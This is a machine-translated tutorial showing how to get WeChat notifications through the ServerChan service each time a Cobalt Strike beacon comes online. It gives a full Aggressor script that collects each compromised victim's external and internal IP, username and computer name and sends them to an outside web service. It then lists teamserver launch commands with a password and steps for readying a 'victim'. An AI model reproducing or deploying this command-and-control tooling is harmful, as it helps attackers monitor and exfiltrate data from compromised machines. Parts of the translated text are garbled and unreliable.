Reference list:
Use Server sauce to realize Cobalt Strike host launch WeChat reminder Use ServerChan to realize Cobalt Strike
launch WeChat reminder
Experimental ideas, with the help of Server sauce
Server sauce
Website address: http://sc.ftqq.com/3.version
log in
You need to log in to this website, or you can log in with your GitHub account with one click, then bind to "WeChat Push"
and then click "Send Message" to do a test to confirm that the message is received normally, and the "call code" next to it will be used for a while When it arrives, copy it, and then you can leave the page.
Prepare the script
Prepare a http_ftqq.cna
script called , if you want to ask why, just ask Server sauce.
Fill in the SCKEY code on line 25, which is the "call code" you just copied
# 循环获取所有beacon
on beacon_initial {
sub http_get {
local('$output');
$url = [new java.net.URL: $1];
$stream = [$url openStream];
$handle = [SleepUtils getIOHandle: $stream, $null];
@content = readAll($handle);
foreach $line (@content) {
$output .= $line . "\r\n";
}
println($output);
}
#获取ip、计算机名、登录账号
$externalIP = replace(beacon_info($1, "external"), " ", "_");
$internalIP = replace(beacon_info($1, "internal"), " ", "_");
$userName = replace(beacon_info($1, "user"), " ", "_");
$computerName = replace(beacon_info($1, "computer"), " ", "_");
#get一下Server酱的链接
$url = 'https://sc.ftqq.com/此处填写你Server酱的SCKEY码.send?text=CobaltStrike%e4%b8%8a%e7%ba%bf%e6%8f%90%e9%86%92&desp=%e4%bb%96%e6%9d%a5%e4%ba%86%e3%80%81%e4%bb%96%e6%9d%a5%e4%ba%86%ef%bc%8c%e4%bb%96%e8%84%9a%e8%b8%8f%e7%a5%a5%e4%ba%91%e8%b5%b0%e6%9d%a5%e4%ba%86%e3%80%82%0D%0A%0D%0A%e5%a4%96%e7%bd%91ip:'.$externalIP.'%0D%0A%0D%0A%e5%86%85%e7%bd%91ip:'.$internalIP.'%0D%0A%0D%0A%e7%94%a8%e6%88%b7%e5%90%8d:'.$userName.'%0D%0A%0D%0A%e8%ae%a1%e7%ae%97%e6%9c%ba%e5%90%8d:'.$computerName;
http_get($url);
}
Cobalt Strike preparation
The next step is to launch a host, you can play whatever you want
The cs server is started on kali
sudo chmod +x teamserver
sudo ./teamserver 10.3.139.50 123456
cs client starts on kali
sudo chmod +x start.sh
./start.sh
Load script
New monitor
Victim preparation
online